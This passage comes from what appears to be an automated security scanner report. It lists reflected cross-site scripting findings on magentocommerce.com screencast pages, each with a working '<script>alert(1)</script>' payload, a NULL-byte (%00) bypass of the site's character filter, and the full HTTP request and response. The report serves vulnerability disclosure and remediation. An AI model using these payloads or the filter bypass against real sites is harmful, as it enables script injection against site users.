...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/designers-guide-1f4ebd"><script>alert(1)</script>0b0eb7b22d1/view">
...[SNIP]...

1.18. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/designers-guide-1/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00def0b"><script>alert(1)</script>c6549ed30de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as def0b"><script>alert(1)</script>c6549ed30de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/designers-guide-1/view?%00def0b"><script>alert(1)</script>c6549ed30de=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176140; expires=Sat, 11-Aug-2012 15:09:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Fscreencasts%2Fdesigners-guide-1%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:00 GMT
Content-Length: 37527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/designers-guide-1/view?%00def0b"><script>alert(1)</script>c6549ed30de=1">
...[SNIP]...

1.19. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/gift-certificates-cards/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60c40"><script>alert(1)</script>c1bbef6f38a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/gift-certificates-cards60c40"><script>alert(1)</script>c1bbef6f38a/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176170; expires=Sat, 11-Aug-2012 15:09:30 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:31 GMT
Content-Length: 33506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/gift-certificates-cards60c40"><script>alert(1)</script>c1bbef6f38a/view">
...[SNIP]...

1.20. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/gift-certificates-cards/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0030566"><script>alert(1)</script>1b56dd24d01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30566"><script>alert(1)</script>1b56dd24d01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/gift-certificates-cards/view?%0030566"><script>alert(1)</script>1b56dd24d01=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176072; expires=Sat, 11-Aug-2012 15:07:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fgift-certificates-cards%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:52 GMT
Content-Length: 33368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view?%0030566"><script>alert(1)</script>1b56dd24d01=1">
...[SNIP]...

1.21. http://www.magentocommerce.com/media/screencasts/grouped-products/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/grouped-products/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee831"><script>alert(1)</script>08d6ab08592 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/grouped-productsee831"><script>alert(1)</script>08d6ab08592/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176334; expires=Sat, 11-Aug-2012 15:12:14 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:14 GMT
Content-Length: 33499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/grouped-productsee831"><script>alert(1)</script>08d6ab08592/view">
...[SNIP]...

1.22. http://www.magentocommerce.com/media/screencasts/grouped-products/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/grouped-products/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006d1e3"><script>alert(1)</script>aba8c91f3b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d1e3"><script>alert(1)</script>aba8c91f3b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/grouped-products/view?%006d1e3"><script>alert(1)</script>aba8c91f3b4=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176258; expires=Sat, 11-Aug-2012 15:10:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fgrouped-products%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:58 GMT
Content-Length: 33173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/grouped-products/view?%006d1e3"><script>alert(1)</script>aba8c91f3b4=1">
...[SNIP]...

1.23. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/introducing-the-magento-enterprise-edition/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7ecf"><script>alert(1)</script>ff43114dd65 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/introducing-the-magento-enterprise-editionc7ecf"><script>alert(1)</script>ff43114dd65/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176165; expires=Sat, 11-Aug-2012 15:09:25 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:25 GMT
Content-Length: 33525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-editionc7ecf"><script>alert(1)</script>ff43114dd65/view">
...[SNIP]...

1.24. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/introducing-the-magento-enterprise-edition/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0010cbe"><script>alert(1)</script>0bc041d5609 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 10cbe"><script>alert(1)</script>0bc041d5609 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/introducing-the-magento-enterprise-edition/view?%0010cbe"><script>alert(1)</script>0bc041d5609=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176067; expires=Sat, 11-Aug-2012 15:07:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A67%3A%22%2Fmedia%2Fscreencasts%2Fintroducing-the-magento-enterprise-edition%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:48 GMT
Content-Length: 33370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view?%0010cbe"><script>alert(1)</script>0bc041d5609=1">
...[SNIP]...

1.25. http://www.magentocommerce.com/media/screencasts/landing-pages/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/landing-pages/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26f38"><script>alert(1)</script>f7a0f786ba8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/landing-pages26f38"><script>alert(1)</script>f7a0f786ba8/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176307; expires=Sat, 11-Aug-2012 15:11:47 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:48 GMT
Content-Length: 33496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/landing-pages26f38"><script>alert(1)</script>f7a0f786ba8/view">
...[SNIP]...

1.26. http://www.magentocommerce.com/media/screencasts/landing-pages/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/landing-pages/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b1897"><script>alert(1)</script>5cb5f08d5e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1897"><script>alert(1)</script>5cb5f08d5e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/landing-pages/view?%00b1897"><script>alert(1)</script>5cb5f08d5e7=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176204; expires=Sat, 11-Aug-2012 15:10:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Flanding-pages%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:04 GMT
Content-Length: 36310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/landing-pages/view?%00b1897"><script>alert(1)</script>5cb5f08d5e7=1">
...[SNIP]...

1.27. http://www.magentocommerce.com/media/screencasts/permissions/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/permissions/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1385"><script>alert(1)</script>c0704bd17d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/permissionsc1385"><script>alert(1)</script>c0704bd17d3/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176230; expires=Sat, 11-Aug-2012 15:10:30 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:30 GMT
Content-Length: 33494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/permissionsc1385"><script>alert(1)</script>c0704bd17d3/view">
...[SNIP]...

1.28. http://www.magentocommerce.com/media/screencasts/permissions/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/permissions/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0075a4d"><script>alert(1)</script>e0c36da2c0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75a4d"><script>alert(1)</script>e0c36da2c0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/permissions/view?%0075a4d"><script>alert(1)</script>e0c36da2c0b=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176152; expires=Sat, 11-Aug-2012 15:09:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Fscreencasts%2Fpermissions%2Fview%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A4%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:12 GMT
Content-Length: 35313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/permissions/view?%0075a4d"><script>alert(1)</script>e0c36da2c0b=1">
...[SNIP]...

1.29. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd2a4"><script>alert(1)</script>c0886635f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/private-sales-including-events-invitations-and-category-access-permissionsfd2a4"><script>alert(1)</script>c0886635f2/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176150; expires=Sat, 11-Aug-2012 15:09:10 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:10 GMT
Content-Length: 33556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissionsfd2a4"><script>alert(1)</script>c0886635f2/view">
...[SNIP]...

1.30. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0091413"><script>alert(1)</script>c91b0ff721a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91413"><script>alert(1)</script>c91b0ff721a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view?%0091413"><script>alert(1)</script>c91b0ff721a=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
